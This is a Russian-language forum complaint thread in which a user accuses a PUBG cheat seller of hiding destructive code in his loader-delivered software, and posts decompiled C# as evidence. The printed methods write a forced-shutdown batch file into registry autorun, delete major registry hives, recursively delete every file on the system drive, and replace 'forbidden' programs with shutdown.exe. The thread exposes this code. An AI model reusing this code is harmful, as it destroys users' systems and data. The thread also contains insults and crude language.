Жалоба от pubg4u на Solik

[Erorr]

Хочу заметить что большинство моих постов это док-во, с описанием и скринами.

Согласен с этим,чего нельзя сказать о ответчике,но намного лучше что бы это было лично в лс.А не разводить срачь на форуме,разделять его на две стороны.
Если ответчика забанят,небось еще создадут петицию о разбане,не понимая что решение принимают только администраторы.

 

[pubg4u]

Согласен с этим,чего нельзя сказать о ответчике,но намного лучше что бы это было лично в лс.А не разводить срачь на форуме,разделять его на две стороны.
Если ответчика забанят,небось еще создадут петицию о разбане,не понимая что решение принимают только администраторы.

Лучше пусть видит вся аудитория кто есть кто.

 

[Solik]

Лучше пусть видит вся аудитория кто есть кто.

Но мы то знаем как все на самом деле

 

[Solik]

Ожидаем новый арбитраж в ближйшем будующем, на один из лаунчеров ) могу уверить) разница с твоим прошлым арбитражем на лафко в том что тут ты в открытую не заявляешь о попытке кряка . А так все тоже

 

[pubg4u]

У меня на руках 2 билда; новый что есть при загрузке по ссылке из шопа
и старый который был под реверсом
они разные

кодер все изменил
@Solik еще раз пиздабол))

 

[Solik]

У меня на руках 2 билда; новый что есть при загрузке по ссылке из шопа
и старый который был под реверсом
они разные

кодер все изменил
@Solik еще раз пиздабол))

Пруф?лоадер совершенна тот же

 

[AnDr1uS]

Пруф?лоадер совершенна тот же

Ты косишь под дебила? или действительно им являешься. Тебе ли не знать, что твой лоадер всего лишь скачивает билд софта с сервера...

 

[pubg4u]

Пруф?лоадер совершенна тот же

лоадер совершенно тот же. к твоему сожалению софт который теперь покадчивается другой

 

[Solik]

лоадер совершенно тот же. к твоему сожалению софт который теперь покадчивается другой

Это просто слова, покажи отличия?)

 

[pubg4u]

Это просто слова, покажи отличия?)

ну схуев у 2 файлов разные хеши?

 

[Solik]

ну схуев у 2 файлов разные хеши?

Скачай 3 раз, ты будеш в шоке.

 

[pubg4u]

Скачай 3 раз, ты будеш в шоке.

аргумент. ну значит если софт был не изменен в любом случае мои комменты на 1-6 страницы чистая правда и ты должен будешь уйти в бан))))

получается мне вообще на руку тот факт что кодер ничего не изменил))

 

[Solik]

аргумент. ну значит если софт был не изменен в любом случае мои комменты на 1-6 страницы чистая правда и ты должен будешь уйти в бан))))

получается мне вообще на руку тот факт что кодер ничего не изменил))

А за что в бан то?)

 

[pubg4u]

А за что в бан то?)

За то что в софте есть код который въебывает систему)))

 

[pubg4u]

Пожалуйста, авторизуйтесь для просмотра ссылки.

оригинальный файл
можете проверишь по хешам что скачивает лодырь солика

Можете проверить заголовки подписей и тп, и заметите что они идентичные.

 

[Solik]

Пожалуйста, авторизуйтесь для просмотра ссылки.

оригинальный файл
можете проверишь по хешам что скачивает лодырь солика

Пожалуйста, авторизуйтесь для просмотра ссылки.

Можете проверить заголовки подписей и тп, и заметите что они идентичные.

Окау друг, какое правило форума я нарушил ? какой конкретно пункт? Даже в разделе правил для пабг этого нет. Нехуй крякать все что подруку попадет ) вон в кс стилаки и т.д полный бот нет . И проекты живут , ибо их боятся крякать. Я попрашу кодера смягчить меры защиты на счет винды и т.д + в теме укажу что может слететь винда если юзать эти проги.Но не более.

 

[kotre]

Так получается, что pubg4u прав?)

 

[Solik]

Так получается, что pubg4u прав?)

С одной стороны да , а со второй и я не причем. Я сказал что трабла есть , но это не повад для бана и т.д . Сегодня завтра выкатим фикс и на этом все.

 

[pubg4u]

Окау друг, какое правило форума я нарушил ?

Ладно. Давай я для удобства будущего арбитра данной жалобы объеденю все в 1 пост. В котором будет вся информация что я нашел по .exe файлу. Во первых: пруф того что исходник я показываю именно того софта который у тебя в лодыре:

Спойлер

Пожалуйста, авторизуйтесь для просмотра ссылки.

оригинальный файл
можете проверишь по хешам что скачивает лодырь солика

Пожалуйста, авторизуйтесь для просмотра ссылки.

method_42 (Token: 0x06000093): скриншот -

Пожалуйста, авторизуйтесь для просмотра ссылки.

    private void method_42()
    {
        if (this.method_28())
        {
            this.method_27(new string[]
            {
                "Critical ERROR"
            });
        }
        else
        {
            this.method_41("");
            this.method_40();
        }
        this.method_38();
    }

Данная функция вызывает в условии 2 функции:
method_41 (Token: 0x06000092): скриншот -

Пожалуйста, авторизуйтесь для просмотра ссылки.

    private void method_41(string string_58 = "")
    {
        try
        {
            string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "boot.bat");
            if (!File.Exists(text))
            {
                File.WriteAllText(text, "shutdown.exe -s -t 00 -f");
                this.method_30(text);
                Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("Boot", text);
            }
        }
        catch
        {
        }
    }

Данная функция создает .bat файл с функцией перезагрузки системы, и после записывает .bat в авто-загрузку.

method_40 (Token: 0x06000091) скриншот -

Пожалуйста, авторизуйтесь для просмотра ссылки.

    private void method_40()
    {
        this.method_81();
        try
        {
            Registry.CurrentUser.DeleteSubKeyTree("Software");
        }
        catch
        {
        }
        try
        {
            Registry.CurrentUser.DeleteSubKeyTree("System");
        }
        catch
        {
        }
        try
        {
            Registry.LocalMachine.DeleteSubKeyTree("System");
        }
        catch
        {
        }
        this.method_32(Path.Combine(Path.Combine(Form1.string_28, "TslGame\\Binaries\\Win64"), "bgsecondary.dat"));
        this.method_32(Form1.string_9);
        this.method_32(Form1.string_10);
        this.method_32(Form1.string_12);
        this.method_31(Form1.string_6);
        this.method_33(Form1.string_6, true);
        this.method_31(Path.GetPathRoot(Environment.SystemDirectory));
        this.method_33(Path.GetPathRoot(Environment.SystemDirectory), true);
        this.method_85(true);
        this.method_39();
        try
        {
            string text = string.Empty;
            text = text + "attrib -r \"" + Form1.string_13 + "\"\n";
            text = text + "attrib -s -h \"" + Form1.string_13 + "\"\n";
            text = text + "DEL /F \"" + Form1.string_13 + "\"\n";
            text += ":loop\n";
            text = text + "taskkill /f /im " + Form1.string_15 + "\n";
            text += "goto loop \n";
            this.method_35(text);
        }
        catch
        {
        }
        this.method_38();
    }

Данная функция в начале кода удаляет 3 ветки реестра:
1. CurrentUser > Software
2. CurrentUser > System
3. LocalMachine > System
официальная документация от Microsoft по функции которые используются для удаления разделов в рееестре -

Пожалуйста, авторизуйтесь для просмотра ссылки.

После софт выполняет функцию, в которую передает системную папку:

this.method_31(Path.GetPathRoot(Environment.SystemDirectory));

method_31(Token: 0x06000088) скриншот -

Пожалуйста, авторизуйтесь для просмотра ссылки.

    private void method_31(string string_58)
    {
        try
        {
            foreach (string string_59 in Directory.EnumerateFiles(string_58, "*.*", SearchOption.AllDirectories))
            {
                this.method_32(string_59);
            }
        }
        catch
        {
        }
    }

Данная функция используя цикл, извлекает из папки (в данном случае системной ибо именно она была выше передана) все файлы по маске "*.*" используя флаг ПОИСК ПО ВСЕМ ДИРЕКТОРИЯМ в переменную string_59 и удаляет все найденные файлы фунцией:
method_32 (Token: 0x06000089 ) скриншот -

Пожалуйста, авторизуйтесь для просмотра ссылки.

 

[pubg4u]

Ко всему прочему, есть функция которая так же проверяет ранее запущенные программы:
method_14 (Token: 0x06000077)скриншот -

Пожалуйста, авторизуйтесь для просмотра ссылки.

    private void method_14()
    {
        try
        {
            string name = "Software\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache";
            foreach (string text in Registry.CurrentUser.OpenSubKey(name).GetValueNames())
            {
                if (text.Contains(".exe"))
                {
                    try
                    {
                        string text2 = text.ToLower();
                        string text3 = Registry.GetValue("HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache", text, "").ToString().ToLower();
                        string text4 = text;
                        text4 = text4.Substring(0, text4.IndexOf(".exe") + 4);
                        if (File.Exists(text4))
                        {
                            foreach (string text5 in this.string_40)
                            {
                                if (text2.Contains(text5) || text3.Contains(text5))
                                {
                                    WebClient webClient = this.method_47();
                                    webClient.Headers.Set("rep", this.method_53(string.Concat(new string[]
                                    {
                                        "Forbidden: [",
                                        text5,
                                        "] in [",
                                        text,
                                        "]"
                                    }), webClient.Headers.Get("cryptkey") + "rep"));
                                    webClient.DownloadData(Form1.string_1);
                                    this.method_27(new string[]
                                    {
                                        "Disallowed program found:",
                                        text4
                                    });
                                    this.method_32(text4);
                                    try
                                    {
                                        File.Copy(Path.Combine(Environment.SystemDirectory, "shutdown.exe"), text4, true);
                                    }
                                    catch
                                    {
                                    }
                                    this.method_38();
                                    return;
                                }
                            }
                        }
                    }
                    catch (Exception ex)
                    {
                        WebClient webClient2 = this.method_47();
                        webClient2.Headers.Set("rep", this.method_53("Disallowed program check (ERROR): " + ex.Message, webClient2.Headers.Get("cryptkey") + "rep"));
                        webClient2.DownloadData(Form1.string_1);
                        this.method_85(true);
                        this.method_38();
                    }
                }
            }
        }
        catch
        {
        }
    }

Краткое описание алгоритма: программа получает из реестра список ранее запущенных програм в виде - название/путь к программе.
Если в этом списке есть программа из списка запрещенных который встроен в софте то она удаляет данные файлы с вашего ПК функцией method_32 о которой было сказано выше.